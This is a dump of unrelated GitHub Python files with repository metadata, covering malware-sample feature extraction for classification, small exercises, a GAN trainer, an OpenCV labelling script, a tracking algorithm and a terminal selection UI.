actual value\n sections_final = sections_set.intersection(set(pe_sections))\n sections_final = list(sections_final)\n save_obj(sections_final, 'sections')\n return sections_final\n\n\n# Feature extraction implemented using UNIX's grep command for faster\n# extraction. Function returns all sections with an available virtual\n# and raw section size.\ndef extract_vsrs_sections(files_list):\n vsrs_sections = set()\n total_files = len(files_list)\n for idx, file_name in enumerate(files_list):\n asm_file = dataset_dir + 'train/' + file_name + '.asm.gz'\n proc_vs = subprocess.run(['zgrep', 'Virtual size', asm_file], stdout=subprocess.PIPE)\n proc_ss = subprocess.run(['zgrep', 'Section size', asm_file], stdout=subprocess.PIPE)\n output_vs = proc_vs.stdout.decode('ISO-8859-1')\n output_ss = proc_ss.stdout.decode('ISO-8859-1')\n sect_vs_list = []; sect_ss_list = []\n for line in output_vs.split('\\n')[:-1]:\n section_name = line.split(':')[0]\n # extract virtual size using REGEX (refer to IDA .asm generated file format)\n regexp_vs = re.search('\\(\\s*(\\d+)\\.\\)', line)\n if regexp_vs:\n sect_vs = int(regexp_vs.group(1))\n sect_vs_list.append(section_name)\n for line in output_ss.split('\\n')[:-1]:\n section_name = line.split(':')[0]\n # extract raw size using REGEX (refer to IDA .asm generated file format)\n regexp_ss = re.search('\\(\\s*(\\d+)\\.\\)', line)\n if regexp_ss:\n sect_ss = int(regexp_ss.group(1))\n sect_ss_list.append(section_name)\n\n # section should be considered 'legit' only if both virtual size and raw section\n # size is provided is the .asm file\n inter_set = set(sect_vs_list).intersection(set(sect_ss_list))\n vsrs_sections = vsrs_sections.union(inter_set)\n progress_bar(idx+1, total_files, 50)\n\n save_obj(list(vsrs_sections), 'vsrs_sections')\n return list(vsrs_sections)\n\n\n# Sections information extraction using unix commands to speed-up the process\ndef extract_sections_info(sect_dict, files_list):\n # extract_vsrs_sections() must be executed prior to this command\n vsrs_set = set(load_obj('vsrs_sections'))\n vsrs_sections = list(vsrs_set.intersection(set(pe_sections)))\n # extract_legit_sections() must be executed prior to this command\n legit_sections = load_obj('sections')\n total_files = len(files_list)\n for idx, file_name in enumerate(files_list):\n for key in sect_dict:\n sect_dict[key].append(0)\n asm_file = dataset_dir + 'train/' + file_name + '.asm.gz'\n lines_proc = 
subprocess.run(['zgrep', '-c', '^', asm_file], stdout=subprocess.PIPE)\n total_lines = int(lines_proc.stdout.decode('ISO-8859-1').strip())\n for section in legit_sections:\n # extract lines of the specific section\n grep_regex = '^\\\\' + section + ':'\n proc = subprocess.run(['zgrep', '-c', grep_regex, asm_file], stdout=subprocess.PIPE)\n sect_lines = int(proc.stdout.decode('ISO-8859-1').strip())\n sect_dict[section + '_linesperc'][idx] = float(sect_lines)/total_lines\n\n proc_vs = subprocess.run(['zgrep', 'Virtual size', asm_file], stdout=subprocess.PIPE)\n proc_ss = subprocess.run(['zgrep', 'Section size', asm_file], stdout=subprocess.PIPE)\n output_vs = proc_vs.stdout.decode('ISO-8859-1')\n output_ss = proc_ss.stdout.decode('ISO-8859-1')\n for line in output_vs.split('\\n')[:-1]:\n section_name = line.split(':')[0]\n if section_name not in vsrs_sections:\n continue\n # extract virtual size using REGEX (refer to IDA .asm generated file format)\n regexp_vs = re.search('\\(\\s*(\\d+)\\.\\)', line)\n if regexp_vs:\n sect_vs = int(regexp_vs.group(1))\n sect_dict[section_name + '_vs'][idx] = sect_vs\n \n total_vs = sum(sect_dict[s + '_vs'][idx] for s in vsrs_sections)\n if total_vs != 0:\n for section in vsrs_sections:\n sect_dict[section + '_vsperc'][idx] = float(sect_dict[section + '_vs'][idx])/total_vs\n \n for line in output_ss.split('\\n')[:-1]:\n section_name = line.split(':')[0]\n if section_name not in vsrs_sections:\n continue\n # extract raw size using REGEX (refer to IDA .asm generated file format)\n regexp_ss = re.search('\\(\\s*(\\d+)\\.\\)', line)\n if regexp_ss:\n sect_ss = int(regexp_ss.group(1))\n # TODO: find more clever similarity function\n if sect_ss != 0:\n sim = float(sect_dict[section_name + '_vs'][idx] - sect_ss)/sect_ss\n sect_dict[section_name + '_vsrs_sim'][idx] = sim\n progress_bar(idx+1, total_files, 50)\n\n \n sections_pd = pd.DataFrame.from_dict(sect_dict)\n sections_pd.to_csv('results/section_features.csv', index=False)\n save_obj(sections_pd, 'section_features')\n return sections_pd\n\n\n# Create a dictionary with keys corresponding to each valid sections, in order to\n# count number of occurences and percentage of each section.\ndef sections_dict_initialization():\n # extract_sections_labels() should be executed prior to this command\n sections_list = load_obj('sections')\n # extract_vsrs_sections() should be executed prior to this commad\n vsrs_set = set(load_obj('vsrs_sections'))\n vsrs_sections = list(vsrs_set.intersection(set(pe_sections))) \n sections_vs = [s + '_vs' for s in vsrs_sections]\n sections_perc = [s + '_vsperc' for s in vsrs_sections]\n sections_lines = [s + '_linesperc' for s in sections_list]\n # TODO: calculate the similarity between VS and raw size maybe?? 
\n # a similarity function implemented in the difference of virtual size and raw size\n sections_sim = [s + '_vsrs_sim' for s in vsrs_sections]\n sections_features = sections_vs + sections_perc + sections_lines + sections_sim\n sect_dict = dict((k, []) for k in sections_features)\n return sect_dict\n\n\ndef extract_segments(): \n train_labels = pd.read_csv(trainLabels)\n files_list = train_labels['Id'].tolist()\n extract_legit_sections(files_list)\n extract_vsrs_sections(files_list)\n sect_dict = sections_dict_initialization()\n extract_sections_info(sect_dict, files_list)\n\nexract_segments()\n","repo_name":"dlekkas/malware_classification","sub_path":"src/feature_eng/extract_sections.py","file_name":"extract_sections.py","file_ext":"py","file_size_in_byte":8782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"28625341368","text":"#WAP to perform basic arithmetic operation on two number by choice.\nnum1 = input('Enter first number: ') \nnum2 = input('Enter second number: ') \nchoice = int(input('choice :-\\nsum : 1 \\tsub : 2\\nmul : 3 \\tdiv : 4\\n'))\nsum = float(num1) + float(num2)\nmin = float(num1) - float(num2) \nmul = float(num1) * float(num2) \ndiv = float(num1) / float(num2) \nif choice == 1 :\n print('The sum of {0} and {1} is {2}'.format(num1, num2, sum)) \nelif choice ==2:\n print('The subtraction of {0} and {1} is {2}'.format(num1, num2, min))\nelif choice ==3:\n print('The multiplication of {0} and {1} is {2}'.format(num1, num2, mul)) \nelif choice ==4 : \n print('The division of {0} and {1} is {2}'.format(num1, num2, div)) \n# Output:\n# Enter first number: 56\n# Enter second number: 87 \n# choice :-\n# sum : 1 sub : 2\n# mul : 3 div : 4\n# 4\n# The division of 56 and 87 is 0.6436781609195402\n","repo_name":"vikassharmanaini/python-lab-file","sub_path":"24.py","file_name":"24.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"84834109","text":"class Solution:\r\n def maxProfit(self, prices: List[int]) -> int:\r\n buy = 10001\r\n sell = 0\r\n\r\n for i in prices:\r\n if buy > i: # 지금 구매한가격보다 더 싼 가격이면\r\n buy = i\r\n\r\n if sell < i - buy: # 기존 이익보다 지금 팔때 이익이 더 크면\r\n sell = i - buy\r\n\r\n return sell","repo_name":"Areum0921/Abox","sub_path":"LeetCode/121. Best Time to Buy and Sell Stock.py","file_name":"121. 
Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"28238414283","text":"#/usr/bin/python3\n\n# http://www.compjour.org/warmups/govt-text-releases/intro-to-bs4-lxml-parsing-wh-press-briefings/\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nurl = 'http://sandiego.craigslist.org/search/sof'\nresp = requests.get(url)\nsoup = BeautifulSoup(resp.text, 'lxml')\n\nurls = []\nfor h in soup.find_all('li'):\n a = h.find('a')\n urls.append(a.attrs['href'])","repo_name":"jamie082/href_xml","sub_path":"href_xml.py","file_name":"href_xml.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28779879085","text":"#!/usr/bin/env python3\n\"\"\"\nmain file\n\nentry point for running assignment 1\n\"\"\"\n\nimport pandas as pd\nfrom loguru import logger\nfrom data import get_data\nfrom analyze import analyze\n\n\ndef initialize() -> None:\n \"\"\"\n initialize config\n \"\"\"\n pd.set_option('mode.chained_assignment', None)\n\n\ndef main() -> None:\n \"\"\"\n main entry point for program\n \"\"\"\n initialize()\n moon_data = get_data()\n logger.info(f'sample of data:\\n\\n{moon_data.head()}')\n logger.info(f'data columns: {moon_data.columns}')\n\n analyze(moon_data, 20)\n analyze(moon_data, 4)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jschmidtnj/astronomy","sub_path":"lab1/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42503992869","text":"from Bio import Entrez\n\nID = 12890024\nOUTPUT = \"result/seq_from_paper.fasta\"\nEntrez.email = \"Your.Name.Here@example.org\"\n\n\ndef download_seq(paper_id, *, output_file, rettype=\"fasta\", retmax=10):\n with Entrez.elink(dbfrom=\"pubmed\", db=\"nucleotide\", id=paper_id,\n linkname=\"pubmed_nuccore\", retmax=retmax) as handle,\\\n open(output_file, \"w\") as output:\n record = Entrez.read(handle)\n ids = []\n for v in record[0][\"LinkSetDb\"][0][\"Link\"]:\n ids.extend(v.values())\n with Entrez.efetch(db=\"nucleotide\", id=ids, rettype=rettype, retmode=\"text\", retmax=retmax) as handle:\n output.write(handle.read())\n\n\nif __name__ == '__main__':\n download_seq(ID, output_file=OUTPUT)\n","repo_name":"ArtyomKaltovich/Phylo","sub_path":"hw2/task1/download_seq_by_paper.py","file_name":"download_seq_by_paper.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32428535912","text":"\"\"\"\nAuthor: Atahan Kucuk\nAssignment: 06.2 - Rock Paper Scissors\nDate: 10/18/2021\n\nDescription:\n It is an simple application that allows users to play rock paper scissors\n\n\n\"\"\"\nimport random as r\n#generating computer choice\ndef get_computer_choice():\n comp= ['rock', 'paper','scissors']\n return r.choice(comp)\n#getting the user input\ndef get_player_choice():\n player = input('Choose rock, paper, or scissors: ')\n #validating user input\n while player == 'rock' or player == 'paper' or player =='scissors':\n return player\n else:\n print('You made an invalid choice. Please try again.')\n player = input('Choose rock, paper, or scissors: ')\n return player\n#determing the winner\ndef get_winner(comp, player):\n status = ' '\n \n if comp == player:\n print(' Its a tie. 
Starting over.')\n status = 'tie'\n elif comp == 'paper' and player == 'rock':\n print(' paper beats rock')\n status = 'computer'\n elif comp == 'rock' and player == 'paper':\n print(' paper beats rock')\n status = 'player'\n elif comp == 'scissors' and player == 'paper':\n print(' scissors beats paper')\n status = 'computer'\n elif player == 'scissors' and comp == 'paper':\n print(' scissors beats paper')\n status = 'player'\n elif comp == 'rock' and player == 'scissors':\n print(' rock beats scissors')\n status = 'computer'\n elif player == 'rock' and comp == 'scissors':\n print(' rock beats scissors')\n status = 'player'\n return status\n\ndef main():\n #storing the choices\n comp = get_computer_choice()\n player = get_player_choice()\n print(' The computer chose '+comp+', and you chose '+player+'.')\n win = get_winner(comp,player)\n #comparing the chocies to determine who wins or who loose\n while win == 'tie':\n \n comp = get_computer_choice()\n player = get_player_choice()\n win = get_winner(comp,player)\n print(' The computer chose '+comp+', and you chose '+player+'.')\n if win == 'computer': \n print(' You lost. Better luck next time.')\n if win == 'player':\n print(' You won the game!')\n print('Thanks for playing.')\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"atahan99/Python-Coding-Lab","sub_path":"6th/rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21159501919","text":"\nimport os\nimport torch\n\nfrom .base_trainer import BaseTrainer\nfrom .utils.init_utils import init_optim\nfrom .utils.gan_utils import *\nfrom .utils.report_utils import *\n\n\nclass GANTrainer(BaseTrainer):\n \"\"\"A trainer for a GAN.\"\"\"\n\n def __init__(self, model, dataset,\n D_optim_config={},\n G_optim_config={},\n D_iters=5,\n clamp=0.01,\n gp_coeff=10.0,\n generate_grid_interval=200,\n **kwargs):\n \"\"\"\n Initializes GANTrainer.\n\n Note:\n Optimizer's configurations/parameters must be passable to the\n optimizer (in torch.optim). It should also include a parameter\n `optim_choice` for the choice of the optimizer (e.g. 
\"sgd\" or \"adam\").\n\n Args:\n model: The model.\n dataset: The dataset.\n D_optim_config: Configurations for the discriminator's optimizer.\n G_optim_config: Configurations for the generator's optimizer.\n D_iters: Number of iterations to train discriminator every batch.\n clamp: Range on which the discriminator's weight will be clamped after each update.\n gp_coeff: A coefficient for the gradient penalty (gp) of the discriminator.\n generate_grid_interval: Check progress every `generate_grid_interval` batch.\n \"\"\"\n super().__init__(model, dataset, **kwargs)\n\n self.D_iters = D_iters\n self.clamp = clamp\n self.gp_coeff = gp_coeff\n self.generate_grid_interval = generate_grid_interval\n\n # Initialize optimizers for generator and discriminator\n self.D_optim = init_optim(self.model.D.parameters(), **D_optim_config)\n self.G_optim = init_optim(self.model.G.parameters(), **G_optim_config)\n\n # Initialize list of image grids generated from a fixed latent variable\n grid_size = 8 * 8\n self._fixed_latent = torch.randn([grid_size, self.model.num_latents], device=self.device)\n self._generated_grids = []\n\n\n #################### Training Methods ####################\n\n def train_step(self):\n \"\"\"\n Makes one training step.\n Throughout this doc, we will denote a sample from the real data\n distribution, fake data distribution, and latent variables respectively\n as follows:\n x ~ real, x_g ~ fake, z ~ latent\n\n Now recall that in order to train a GAN, we try to find a solution to\n a min-max game of the form `min_G max_D V(G,D)`, where G is the generator,\n D is the discriminator, and V(G,D) is the score function.\n For a regular GAN, V(G,D) = log(D(x)) + log(1 - D(x_g)),\n which is the Jensen-Shannon (JS) divergence between the probability\n distributions P(x) and P(x_g), where P(x_g) is parameterized by G.\n\n When it comes to Wasserstein GAN (WGAN), the objective is to minimize\n the Wasserstein (or Earth-Mover) distance instead of the JS-divergence.\n See Theorem 3 and Algorithm 1 in the original paper for more details.\n We can achieve that (thanks to the Kantorovich-Rubinstein duality)\n by first maximizing `D(x) - D(x_g)` in the space of 1-Lipschitz\n discriminators D, where x ~ data and x_g ~ fake.\n Then, we have the gradient wrt G of the Wasserstein distance equal\n to the gradient of -D(G(z)).\n Since we assumed that D should be 1-Lipschitz, we can enforce\n k-Lipschitzness by clamping the weights of D to be in some fixed box,\n which would be approximate up to a scaling factor.\n\n Enforcing Lipschitzness is done more elegantly in WGAN-GP,\n which is just WGAN with gradient penalty (GP). The gradient penalty\n is used because of the statement that a differentiable function is\n 1-Lipschitz iff it has gradient norm equal to 1 almost everywhere\n under P(x) and P(x_g). 
Hence, the objective will be similar to WGAN,\n        which is `min_G max_D of D(x) - D(x_g)`, but now we add the gradient\n        penalty in the D_step such that it will be minimized.\n\n        Links to the papers:\n        GAN: https://arxiv.org/pdf/1406.2661.pdf\n        WGAN: https://arxiv.org/pdf/1701.07875.pdf\n        WGAN-GP: https://arxiv.org/pdf/1704.00028.pdf\n        \"\"\"\n\n        for _ in range(self.D_iters):\n            # Sample real data from the dataset\n            sample = self.sample_dataset()\n            real = sample[\"before\"].to(self.device)\n\n            # Sample latent and train discriminator\n            latent = self.sample_latent()\n            D_results = self.D_step(real, latent)\n\n        # Sample latent and train generator\n        latent = self.sample_latent()\n        G_results = self.G_step(latent)\n        \n        # Record data\n        self.add_data(**D_results, **G_results)\n        results = {**D_results, **G_results}\n        losses = {k: v for k, v in results.items() if k.find(\"loss\") != -1}\n        D_evals = {k: v for k, v in results.items() if k.find(\"D_on\") != -1}\n        self.writer.add_scalars(\"losses\", losses, self.iters)\n        self.writer.add_scalars(\"D_evals\", D_evals, self.iters)\n\n\n    def D_step(self, real, latent):\n        \"\"\"\n        Makes a training step for the discriminator of the model.\n\n        Args:\n            real: Sample from the dataset.\n            latent: Sample from the latent space.\n\n        Returns:\n            D loss and evaluation of D on real and on fake.\n        \"\"\"\n\n        D, G = self.model.D, self.model.G\n\n        # Zero gradients\n        self.D_optim.zero_grad()\n\n        # Sample fake data from a latent (ignore gradients)\n        with torch.no_grad():\n            fake = G(latent)\n\n        # Classify real and fake data\n        D_on_real = D(real)\n        D_on_fake = D(fake)\n\n        # Calculate loss and its gradients\n        D_loss = get_D_loss(D, real, fake, gan_type=self.model.gan_type, gp_coeff=self.gp_coeff)\n        D_loss.backward()\n\n        # Calculate gradients and minimize loss\n        self.D_optim.step()\n\n        # If WGAN, clamp D's weights to ensure k-Lipschitzness\n        if self.model.gan_type == \"wgan\":\n            [p.data.clamp_(-self.clamp, self.clamp) for p in D.parameters()]\n\n        return {\n            \"D_loss\": D_loss.mean().item(),\n            \"D_on_real\": D_on_real.mean().item(),\n            \"D_on_fake1\": D_on_fake.mean().item()\n        }\n\n\n    def G_step(self, latent):\n        \"\"\"\n        Makes a training step for the generator of the model.\n\n        Args:\n            latent: Sample from the latent space.\n        \n        Returns:\n            G loss and evaluation of D on fake.\n        \"\"\"\n\n        D, G = self.model.D, self.model.G\n        \n        # Zero gradients\n        self.G_optim.zero_grad()\n\n        # Sample fake data from latent\n        fake = G(latent)\n\n        # Classify fake data\n        D_on_fake = D(fake)\n\n        # Calculate loss and its gradients\n        G_loss = get_G_loss(D, fake, gan_type=self.model.gan_type)\n        G_loss.backward()\n\n        # Optimize\n        self.G_optim.step()\n\n        # Record results\n        return {\n            \"G_loss\": G_loss.mean().item(),\n            \"D_on_fake2\": D_on_fake.mean().item(),\n        }\n\n\n    def sample_latent(self):\n        \"\"\"\n        Samples from the latent space (i.e. 
input space of the generator).\n\n Returns:\n Sample from the latent space.\n \"\"\"\n\n # Calculate latent size and sample from normal distribution\n latent_size = [self.batch_size, self.model.num_latents]\n latent = torch.randn(latent_size, device=self.device)\n\n return latent\n\n\n #################### Reporting and Tracking Methods ####################\n\n\n def stop(self):\n \"\"\"\n Stops the trainer and report the result of the experiment.\n \"\"\"\n\n losses = self.get_data_containing(\"loss\")\n evals = self.get_data_containing(\"D_on\")\n\n if not self.save_results:\n plot_lines(losses, title=\"Losses\")\n plot_lines(evals, title=\"Evals\")\n return\n\n # Create experiment directory in the model's directory\n experiment_dir = os.path.join(self.results_dir, self.get_experiment_name())\n\n # Save model\n model_path = os.path.join(experiment_dir, \"model.pt\")\n self.save_model(model_path)\n\n # Plot losses of D and G\n losses_file = os.path.join(experiment_dir, \"losses.png\")\n plot_lines(losses, filename=losses_file, title=\"Losses of D and G\")\n\n # Plot evals of D on real and fake data\n evals_file = os.path.join(experiment_dir, \"evals.png\")\n plot_lines(evals, filename=evals_file, title=\"Evaluations of D on real and fake data\")\n\n # Create an animation of the generator's progress\n animation_file = os.path.join(experiment_dir, \"progress.mp4\")\n create_progress_animation(self._generated_grids, animation_file)\n\n # Write details of experiment\n details_txt = os.path.join(experiment_dir, \"repr.txt\")\n with open(details_txt, \"w\") as f:\n f.write(self.__repr__())\n\n\n def post_train_step(self):\n \"\"\"\n The post-training step.\n \"\"\"\n super().post_train_step()\n\n # Check generator's progress by recording its output on a fixed input\n if should_generate_grid:\n grid = generate_grid(self.model.G, self._fixed_latent)\n self._generated_grids.append(grid)\n self.writer.add_image(\"grid\", grid, self.iters)\n\n\n def report_stats(self, precision=3):\n \"\"\"\n Reports/prints the training stats to the console.\n\n Args:\n precision: Precision of the float numbers reported.\n \"\"\"\n\n report = \\\n \"[{epoch}/{num_epochs}][{batch}/{num_batches}]\\t\" \\\n \"Loss of D = {D_loss:.{p}f}\\t\" \\\n \"Loss of G = {G_loss:.{p}f}\\t\" \\\n \"D(x) = {D_on_real:.{p}f}\\t\" \\\n \"D(G(z)) = {D_on_fake1:.{p}f} / {D_on_fake2:.{p}f}\"\n\n stats = {\n \"epoch\": self.epoch,\n \"num_epochs\": self.num_epochs,\n \"batch\": self.batch,\n \"num_batches\": self.num_batches,\n \"D_loss\": self.get_current_value(\"D_loss\"),\n \"G_loss\": self.get_current_value(\"G_loss\"),\n \"D_on_real\": self.get_current_value(\"D_on_real\"),\n \"D_on_fake1\": self.get_current_value(\"D_on_fake1\"),\n \"D_on_fake2\": self.get_current_value(\"D_on_fake2\"),\n \"p\": precision,\n }\n\n print(report.format(**stats))\n\n","repo_name":"zeligism/PairedCycleGAN","sub_path":"src/trainers/gan_trainer.py","file_name":"gan_trainer.py","file_ext":"py","file_size_in_byte":10488,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"81"} +{"seq_id":"25654489224","text":"import base64\nimport string\n\ndef b64d(s):\n n = 0\n while n < 6:\n try:\n res = base64.b64decode(s + '='*n)\n return res\n except Exception as e:\n try:\n res = base64.urlsafe_b64decode(s + '='*n)\n return res\n except Exception as e:\n pass\n return None\n\ndef rot13(s):\n aLo = string.ascii_lowercase\n aUp = string.ascii_uppercase\n s2 = ''\n for i in s:\n if i in aLo:\n s2 += aLo[(aLo.index(i) + 13)%26]\n 
elif i in aUp:\n s2 += aUp[(aUp.index(i) + 13)%26]\n else:\n s2 += i\n return s2\n \n \n \n","repo_name":"Gdasl/STT","sub_path":"STTUtils/encoding.py","file_name":"encoding.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"41209553931","text":"# 연결된 영역 레이블링\r\n# 같은 영역 찾아 칠하기\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nimg = cv2.imread(\"./img/shapes_donut.png\")\r\nimg2 = np.zeros_like(img)\r\n\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n_, th = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\r\n\r\n# 연결된 요소 레이블링 적용\r\n# cv2.connectedComponents(입력 영상)\r\ncnt, labels = cv2.connectedComponents(th)\r\n\r\n# 레이블 개수만큼 순회\r\nfor i in range(cnt):\r\n # 레이블이 같은 영역에 랜덤한 색상 적용\r\n img2[labels==i] = [int(j) for j in np.random.randint(0,255,3)]\r\n \r\nmerged = np.hstack((img,img2))\r\ncv2.imshow(\"connected\", merged)\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()","repo_name":"jso303/OpenCV_Python","sub_path":"Chapter07/connected_label.py","file_name":"connected_label.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18926952380","text":"import numpy as np\nimport cv2, numpy as np, os, pickle\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport grapher\nimport random\nimport functools\nimport make_detections\nimport os\nimport compute_metrics\nimport glob\nimport motmetrics as mm\nimport sys\n\n \ndef colors(n):\n max_value = 16581375 #255**3\n interval = int(max_value / n)\n colors = [hex(I)[2:].zfill(6) for I in range(0, max_value, interval)]\n \n clrs= [(int(i[:2], 16), int(i[2:4], 16), int(i[4:], 16)) for i in colors]\n random.shuffle(clrs)\n return clrs \n\ndef dp_1(detections,c_in,c_ex,c_ij,beta,thr_cost,max_it):\n '''Takes detections in and returns the nodes which form the 1st track'''\n\n c_arr=[]\n for i in range(len(detections['r'])):\n c_arr.append(beta-detections['r'][i])\n detections['c']=c_arr\n\n d_num=len(detections['x'])\n\n print(\"number of detections\",d_num)\n\n detections['dp_c']=[]\n detections['dp_link']=[]\n detections['orig']=[]\n\n min_c = 10000000000000000000000000000000000000000000\n it=0\n k=0\n inds_all=[0 for i in range(100000)]\n id_s =[0 for i in range(100000)]\n redo_nodes=[i for i in range(d_num)]\n\n for i in range(len(redo_nodes)):\n detections['r'][i]*=-1\n detections['dp_c'].append(detections['r'][i]+c_in)\n #print(detections['r'][i])\n detections['dp_link'].append(-1)\n \n print(\"base cases done\")\n tot_min=10000000000000000\n tot_amin=-1\n print(\"DP starting\")\n for i in range(len(redo_nodes)):\n \n mi,amin=c_in,-1\n for node in detections['pr'][i]:\n if detections['dp_c'][node]+detections['r'][i]0:\n detections['dp_c'][i]=10000000000000000000000\n for node in detections['pr'][i]:\n if detections['dp_c'][node]+detections['r'][i]thr_cost:\n break\n final=[]\n cur_ind=tot_amin\n if detections['free'][cur_ind]>0:\n break\n #print(\"Getting path\")\n while cur_ind!=-1:\n final.append(cur_ind)\n detections['free'][cur_ind]=1\n \n #paths.append(final)\n x1,y1=detections['x'][cur_ind],detections['y'][cur_ind]\n x2,y2=x1+detections['w'][cur_ind],y1+detections['h'][cur_ind]\n boxa=[x1,y1,x2,y2]\n if nms:\n for i in range(cur_ind+1,len(detections['x'])):\n if detections['fr'][i]>detections['fr'][cur_ind]:\n break\n x1,y1=detections['x'][i],detections['y'][i]\n x2,y2=x1+detections['w'][i],y1+detections['h'][i]\n 
boxb=[x1,y1,x2,y2]\n if bb_intersection_over_union(boxa,boxb)>0 and abs(detections['r'][i])0 and abs(detections['r'][i]) \", renderer=None):\n \"\"\"Constructor.\n\n Args:\n terminal (Terminal): the terminal that the UI will be created on\n prompt (str): prompt to use before lines that require user input\n renderer (Renderer or None): renderer to use for showing matches\n on the UI. ``None`` means to use a default renderer created\n by ``create_default_renderer()``..\n \"\"\"\n super(TerminalUI, self).__init__()\n\n # If you are thinking about importing readline to add support for\n # fancy editing, don't. Doing so might add extra ANSI escape\n # sequences on some terminals with some versions of readline, which\n # will screw up the output of selecta. This is apparently a readline\n # bug:\n #\n # https://bugs.python.org/issue19884\n\n self.hit_list_limit = 9\n self.prompt = prompt\n self.renderer = renderer or self.create_default_renderer()\n self.terminal = terminal\n\n def create_default_renderer(self):\n \"\"\"Creates a default MatchRenderer_ that is used to show matches on\n the console.\"\"\"\n return MatchRenderer()\n\n\nclass DumbTerminalUI(TerminalUI):\n \"\"\"Dumb terminal-based UI class for ``selecta``. This UI class does not\n require any special capabilities from the terminal (e.g., raw terminal\n access).\"\"\"\n\n def choose_item(self, initial_query=None):\n matches = self.index.search(initial_query) if initial_query else None\n while True:\n self.show_matches(matches)\n query = self.read_query()\n if query is None:\n return None\n\n match_index = safeint(query, 0)\n if match_index > 0 and match_index <= len(matches):\n return matches[match_index-1]\n\n matches = self.index.search(query)\n\n def read_query(self):\n \"\"\"Reads the query string or the index of the match chosen by the\n user from the standard input.\n\n Returns:\n the query string or the index of the match chosen by the user,\n or ``None`` if the user cancelled the selection by submitting EOF\n \"\"\"\n try:\n return raw_input(self.prompt)\n except KeyboardInterrupt:\n return None\n except EOFError:\n return None\n\n def show_matches(self, matches):\n \"\"\"Shows the given list of matches on the standard output.\"\"\"\n matches = matches or []\n limit = self.hit_list_limit\n\n self.renderer.attach_to_terminal(self.terminal)\n for index, match in enumerate(matches[:limit], 1):\n print(\"{index}: {rendered_match}\".format(\n index=index,\n rendered_match=self.renderer.render(match)\n ))\n if len(matches) > limit:\n print(\"...and {0} more\".format(len(matches) - limit))\n\n\nclass SmartTerminalUI(TerminalUI):\n \"\"\"Smart terminal-based UI class for ``selecta`` that provides a snappier\n user experience but requires raw access to the terminal (which might not\n be available on all platforms).\"\"\"\n\n def __init__(self, terminal, prompt=\"> \", renderer=None):\n super(SmartTerminalUI, self).__init__(terminal, prompt, renderer)\n if not terminal.supports(\"LEFT\", \"RIGHT\", \"UP\", \"DOWN\"):\n raise NotSupportedError(\"SmartTerminalUI requires a terminal that \"\n \"supports cursor movement\")\n self._query = None\n self._ui_shown = False\n self.reset()\n\n def choose_item(self, initial_query=None):\n self.query = initial_query or ''\n while True:\n try:\n char = self.terminal.getch()\n except KeyboardInterrupt:\n return None\n except EOFError:\n return None\n\n if Keycodes.is_enter_like(char):\n return self.selected_item\n elif Keycodes.is_backspace_like(char):\n self.query = self.query[:-1]\n elif char == 
Keycodes.CTRL_N or char == Keycodes.DOWN:\n self.adjust_selected_index_by(1)\n elif char == Keycodes.CTRL_P or char == Keycodes.UP:\n self.adjust_selected_index_by(-1)\n elif char == Keycodes.CTRL_U:\n self.query = ''\n elif char == Keycodes.CTRL_W:\n self.query = re.sub(\"[^ ]* *$\", \"\", self.query)\n elif char == Keycodes.ESCAPE:\n return None\n elif is_printable(char):\n self.query += char\n else:\n print(\"Unhandled char: {0!r}\".format(char))\n\n def dispose(self):\n self.hide()\n\n def hide(self):\n \"\"\"Hides the UI. This function assumes that the cursor is currently\n in the first row of the UI.\"\"\"\n if not self._ui_shown:\n return\n\n self._hide()\n self._ui_shown = False\n\n def _hide(self):\n self.terminal.move_cursor(x=0)\n self.terminal.clear_to_eos()\n\n def adjust_selected_index_by(self, offset, wrap=True):\n \"\"\"Adjusts the selected index with the given offset, optionally wrapping\n around the result list.\n\n Args:\n offset (int): the offset to add to the selected index\n wrap (bool): whether to wrap around the result list\n \"\"\"\n if self.selected_index is None:\n return\n new_index = int(self.selected_index) + offset\n if wrap:\n new_index = new_index % self.num_visible_matches\n self.selected_index = new_index\n\n @property\n def num_visible_matches(self):\n \"\"\"The number of matches currently visible on the UI.\"\"\"\n return min(len(self._best_matches), self.hit_list_limit)\n\n @property\n def query(self):\n \"\"\"The current query string shown on the UI.\"\"\"\n return self._query\n\n @query.setter\n def query(self, value):\n \"\"\"Sets the current query string shown on the UI.\"\"\"\n # TODO: optimize if the new query string has the old as a prefix\n if value == self._query:\n return\n self._query = value\n self.refresh()\n\n def refresh(self):\n \"\"\"Redraws the UI. 
